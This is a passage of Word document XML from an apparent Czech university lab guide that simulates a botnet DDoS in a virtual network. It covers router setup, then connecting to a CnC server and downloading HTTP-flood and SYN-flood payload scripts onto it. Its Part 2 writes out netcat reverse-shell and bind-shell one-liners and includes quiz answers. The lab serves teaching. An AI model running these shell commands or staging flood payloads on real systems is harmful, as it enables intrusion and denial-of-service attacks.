          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5832A8E5" wp14:editId="73E1BB5A">
            <wp:extent cx="4916805" cy="3228454"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2834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055" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4925922" cy="3234440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B56895" w14:textId="502E25F6" w:rsidR="009E2424" w:rsidRDefault="00871F40" w:rsidP="009E2424">
      <w:r>
        <w:t>U routeru R3 doplníme podle schématu</w:t>
      </w:r>
      <w:r w:rsidR="009E2424">
        <w:t xml:space="preserve"> (na servery 176.16.1.1./24, na R1 s 128.1.2.2/24 a třemi routy jak u R2 (ale next-hop je 128.1.2.1) a na R2 128.1.3.2/24 s routou na síť botnetu)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD26C7A" w14:textId="74F827BB" w:rsidR="00871F40" w:rsidRDefault="00871F40" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Pro propsání změn můžeme rebootnout, nebo deaktivovat rozhraní </w:t>
      </w:r>
      <w:r w:rsidR="009E2424">
        <w:t>ve nmtui ve „Activate a connection“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46801EB5" w14:textId="5F79492E" w:rsidR="009E2424" w:rsidRDefault="009E2424" w:rsidP="00497EDB">
      <w:r w:rsidRPr="009E2424">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AF962B8" wp14:editId="5C4D1418">
            <wp:extent cx="3134162" cy="1914792"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="173017816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78169" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3134162" cy="1914792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B09B5" w14:textId="77777777" w:rsidR="009E2424" w:rsidRDefault="009E2424" w:rsidP="00497EDB"/>
    <w:p w14:paraId="0845A850" w14:textId="6FF735AB" w:rsidR="00871F40" w:rsidRDefault="005C048C" w:rsidP="00746349">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc192341164"/>
      <w:r>
        <w:t xml:space="preserve">Část </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00920038">
        <w:t>Příprava Scénářů</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF57512" w14:textId="58675031" w:rsidR="00EE24CD" w:rsidRPr="00EE24CD" w:rsidRDefault="00EE24CD" w:rsidP="00EE24CD">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t>Krok 1. Připojení na CnC server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE71305" w14:textId="65B56913" w:rsidR="00920038" w:rsidRDefault="00920038" w:rsidP="009A75C7">
      <w:r>
        <w:t xml:space="preserve">Jak jde vidět z topologie, musíme nějak spravovat x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>botů</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> k útoku. Na to nám slouží CnC server, který se bude chovat jako taková přeposílací jednotka </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloadu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (scriptu), který budeme spouštět v našem botnetu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C4BD4" w14:textId="1D118DD1" w:rsidR="00920038" w:rsidRDefault="00920038" w:rsidP="009A75C7">
      <w:r>
        <w:t xml:space="preserve">Na to abychom mohli upravovat co se bude posílat a kdy, se můžeme například vzdáleně připojit k tomuto serveru ze stroje útočníka a udělat co je potřeba. Jelikož chceme použít shell, tak máme dvě </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>varianty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> které můžeme použít:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC8347" w14:textId="42275F7C" w:rsidR="00920038" w:rsidRDefault="00920038" w:rsidP="00920038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00802F9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006C48F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t xml:space="preserve">nejběžnějším typem vzdáleného </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t>shellu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t xml:space="preserve">, nejrychlejší, musíme ho spustit pomocí využití nějaké zranitelnosti, která umožňuje vzdálené spuštění kódu. U útočníka pak spustíme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t>listening</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C48F6" w:rsidRPr="006C48F6">
        <w:t xml:space="preserve"> na portu a na serveru musíme spustit reverse shell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE7666" w14:textId="1EE785BD" w:rsidR="00802F9E" w:rsidRPr="00802F9E" w:rsidRDefault="00802F9E" w:rsidP="00802F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00802F9E">
        <w:t>Ú:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;port&gt;“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C92139" w14:textId="5199E909" w:rsidR="00802F9E" w:rsidRPr="006C48F6" w:rsidRDefault="00802F9E" w:rsidP="00802F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S: „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/f|/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;naše IP adresa&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/f</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF3C5A" w14:textId="060705F2" w:rsidR="006C48F6" w:rsidRDefault="006C48F6" w:rsidP="00920038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bind shell</w:t>
      </w:r>
      <w:r w:rsidR="00802F9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve">funguje opačně jak reverse shell, my se budeme připojovat na server, kde už bude </w:t>
      </w:r>
      <w:r w:rsidR="00802F9E" w:rsidRPr="00802F9E">
        <w:t xml:space="preserve">muset </w:t>
      </w:r>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve">běžet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>listening</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C5801A" w14:textId="686612A9" w:rsidR="00802F9E" w:rsidRPr="00802F9E" w:rsidRDefault="00802F9E" w:rsidP="00802F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00802F9E">
        <w:t>Ú:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;IP adresa serveru &lt;port&gt;“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675DBA6B" w14:textId="7857C0A2" w:rsidR="00802F9E" w:rsidRPr="00802F9E" w:rsidRDefault="00802F9E" w:rsidP="00802F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S: „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/f|/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> &lt;port&gt; &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>/f</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C685182" w14:textId="2D418D5F" w:rsidR="00802F9E" w:rsidRPr="00802F9E" w:rsidRDefault="006C48F6" w:rsidP="00802F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve">Příklady </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t>one-linerů</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802F9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00802F9E">
        <w:t xml:space="preserve">například na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00802F9E">
        <w:t>InternalAllTheThings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62A3E20B" w14:textId="7EA3F5F4" w:rsidR="009A75C7" w:rsidRDefault="006C48F6" w:rsidP="009A75C7">
      <w:r>
        <w:t xml:space="preserve">Otázka 2.1: </w:t>
      </w:r>
      <w:r w:rsidR="008051DB">
        <w:t>Jeliko</w:t>
      </w:r>
      <w:r w:rsidR="00920038">
        <w:t xml:space="preserve">ž se chceme z útočníkova stroje připojovat do CnC serveru, vždy když chceme, jaký druh </w:t>
      </w:r>
      <w:r w:rsidR="00802F9E">
        <w:t xml:space="preserve">vzdáleného </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00802F9E">
        <w:t>shellu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00802F9E">
        <w:t xml:space="preserve"> bychom měli použít?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376831B0" w14:textId="321D472A" w:rsidR="00802F9E" w:rsidRDefault="00802F9E" w:rsidP="00802F9E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Bind shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C36330" w14:textId="7A1DD2C2" w:rsidR="00EE24CD" w:rsidRDefault="00EE24CD" w:rsidP="00802F9E">
      <w:r>
        <w:t xml:space="preserve">Zatím si spustíme tedy R1, R2, R3, Kali a CnC server. Na CnC serveru bychom měli mít hned v našem Debian účtu </w:t>
      </w:r>
      <w:r w:rsidR="002C0F0B">
        <w:t>vše potřebné pro oba scénáře</w:t>
      </w:r>
      <w:r w:rsidR="00BD76E3">
        <w:t xml:space="preserve"> jen ne naše scripty na HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD76E3">
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD76E3">
        <w:t xml:space="preserve"> či TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD76E3">
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C0F0B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D61C16D" w14:textId="2ABCA6A6" w:rsidR="002C0F0B" w:rsidRDefault="00BD76E3" w:rsidP="00802F9E">
      <w:r w:rsidRPr="00BD76E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2251FE41" wp14:editId="7AB42B9B">
            <wp:extent cx="6395085" cy="283210"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:docPr id="9654777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7713" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6395085" cy="283210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663F947" w14:textId="44980F7A" w:rsidR="00BD76E3" w:rsidRDefault="00BD76E3" w:rsidP="00802F9E">
      <w:r>
        <w:t xml:space="preserve">Zároveň, jelikož už jsme ve </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>stavu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kdy máme zkonfiskovaný server a předělané scripty, tak se musíme kouknout přes jaký port se budeme připojovat na CnC server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D70B6" w14:textId="3B59DB45" w:rsidR="00BD76E3" w:rsidRDefault="00BD76E3" w:rsidP="00802F9E">
      <w:r w:rsidRPr="002C0F0B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013DC827" wp14:editId="3A342ABA">
            <wp:extent cx="5658640" cy="247685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3327930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3043" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5658640" cy="247685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4298631E" w14:textId="28A535ED" w:rsidR="00BD76E3" w:rsidRDefault="00BD76E3" w:rsidP="00802F9E">
      <w:r>
        <w:t>Otázka 2.2: Přes jaký port se budeme připojovat, když náš script je ve bind.sh?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA29E6" w14:textId="3554FD35" w:rsidR="00BD76E3" w:rsidRDefault="00BD76E3" w:rsidP="00BD76E3">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>9444</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B629C8" w14:textId="181BEC94" w:rsidR="00E076AB" w:rsidRDefault="00E076AB" w:rsidP="00E076AB">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:r>
        <w:t>Krok 2. Stahování payload souboru na CnC server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14EDBD" w14:textId="49EDCBF4" w:rsidR="002C0F0B" w:rsidRDefault="002C0F0B" w:rsidP="00802F9E">
      <w:r>
        <w:t xml:space="preserve">Na Kali </w:t>
      </w:r>
      <w:r w:rsidR="00BD76E3">
        <w:t xml:space="preserve">se ověříme, že </w:t>
      </w:r>
      <w:r w:rsidR="00256E3F">
        <w:t>payload soubory</w:t>
      </w:r>
      <w:r w:rsidR="00BD76E3">
        <w:t xml:space="preserve"> máme ve /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD76E3">
        <w:t>home</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD76E3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD76E3">
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD76E3">
        <w:t>/ (měli by se jmenovat payload_http_check.py a payload_tcp_check.py) a otevřeme dva terminály, na jednom zapneme http server a na druhém se připojíme na CnC server (jako kdyby CnC server byl vzdálený)</w:t>
      </w:r>
      <w:r w:rsidR="00256E3F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A7035" w14:textId="0DD0AAAD" w:rsidR="00BD76E3" w:rsidRDefault="00BD76E3" w:rsidP="00802F9E">
      <w:r w:rsidRPr="00BD76E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19306FAA" wp14:editId="5EED0AE3">
            <wp:extent cx="5462546" cy="2028215"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="992925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2526" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5468099" cy="2030277"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5EA5A8" w14:textId="77777777" w:rsidR="00256E3F" w:rsidRDefault="00BD76E3" w:rsidP="00802F9E">
      <w:r>
        <w:t>V </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CnC serveru </w:t>
      </w:r>
      <w:r w:rsidR="00256E3F">
        <w:t>se přemístíme do /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00256E3F">
        <w:t>home</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00256E3F">
        <w:t xml:space="preserve">/Debian/ a nástrojem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00256E3F">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00256E3F">
        <w:t xml:space="preserve"> stáhneme oba scripty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC85D6" w14:textId="77777777" w:rsidR="00256E3F" w:rsidRDefault="00256E3F" w:rsidP="00802F9E">
      <w:r w:rsidRPr="00256E3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9CFA0B" wp14:editId="2A49DEE8">
            <wp:extent cx="5208104" cy="3688735"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="123394628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46285" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5215607" cy="3694049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BDC5A" w14:textId="77777777" w:rsidR="00E076AB" w:rsidRDefault="00256E3F" w:rsidP="00802F9E">
      <w:r>
        <w:t>Tím je připraven CnC server.</w:t>
      </w:r>
    </w:p>
